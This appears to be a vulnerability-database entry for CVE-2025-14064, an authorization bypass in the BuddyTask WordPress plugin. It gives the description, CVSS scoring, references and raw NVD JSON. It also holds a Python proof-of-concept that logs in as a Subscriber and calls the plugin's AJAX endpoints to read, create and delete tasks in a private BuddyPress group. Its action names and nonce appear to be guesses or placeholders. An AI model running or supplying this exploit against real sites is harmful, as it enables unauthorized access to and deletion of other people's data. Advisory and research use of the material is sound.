CVE-2025-14064

Description

The BuddyTask plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on multiple AJAX endpoints in all versions up to, and including, 1.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view, create, modify, and delete task boards belonging to any BuddyPress group, including private and hidden groups they are not members of.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

BuddyTask插件 < 1.3.1（所有1.3.0及以下版本均受影响）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14064 PoC - BuddyTask Plugin Authorization Bypass
# Target: WordPress site with BuddyTask plugin <= 1.3.0

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress.local'
wp_admin_ajax = f'{target_url}/wp-admin/admin-ajax.php'

# Authenticate as Subscriber (lowest privilege level)
session = requests.Session()
login_data = {
    'log': 'attacker_username',
    'pwd': 'attacker_password',
    'wp-submit': 'Log In',
    'redirect_to': '/wp-admin/',
    'testcookie': '1'
}

# Login to WordPress
session.post(f'{target_url}/wp-login.php', data=login_data)

# Exploit: Access private/hidden group task board without membership
# Step 1: List tasks from a private group (group_id=999)
exploit_data_list = {
    'action': 'buddytask_get_tasks',  # AJAX action name
    'group_id': '999',  # Target private/hidden group
    'nonce': 'attacker_can_obtain_from_source'  # Some endpoints may lack nonce
}

print('[+] Sending task list request to private group...')
response = session.post(wp_admin_ajax, data=exploit_data_list)
print(f'Status: {response.status_code}')
print(f'Response: {response.text[:500]}')

# Step 2: Create unauthorized task
exploit_data_create = {
    'action': 'buddytask_create_task',
    'group_id': '999',
    'task_title': 'Malicious Task',
    'task_content': 'Compromised via CVE-2025-14064'
}

print('\n[+] Creating unauthorized task...')
response = session.post(wp_admin_ajax, data=exploit_data_create)
print(f'Status: {response.status_code}')

# Step 3: Delete tasks/exfiltrate data
exploit_data_delete = {
    'action': 'buddytask_delete_task',
    'task_id': '1',  # Target task ID
    'group_id': '999'
}

print('\n[+] Deleting tasks from unauthorized group...')
response = session.post(wp_admin_ajax, data=exploit_data_delete)
print(f'Status: {response.status_code}')

print('\n[!] If above requests succeeded without 403/permission error, target is vulnerable.')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14064
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14064
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14064/
[4] VulDB https://vuldb.com/cve/CVE-2025-14064
[5] https://cwe.mitre.org/data/definitions/862.html
[6] https://plugins.trac.wordpress.org/browser/buddytask/tags/1.3.0/buddytask.php#L458
[7] https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L458
[8] https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L666
[9] https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L763
[10] https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L840
[11] https://plugins.trac.wordpress.org/changeset/3416754/
[12] https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfe0947-5790-49ba-aa3d-6bc61c12b355?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14064", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:47.053", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BuddyTask plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on multiple AJAX endpoints in all versions up to, and including, 1.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view, create, modify, and delete task boards belonging to any BuddyPress group, including private and hidden groups they are not members of."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/862.html", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/buddytask/tags/1.3.0/buddytask.php#L458", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L458", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L666", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L763", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L840", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3416754/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfe0947-5790-49ba-aa3d-6bc61c12b355?source=cve", "source": "[email protected]"}]}}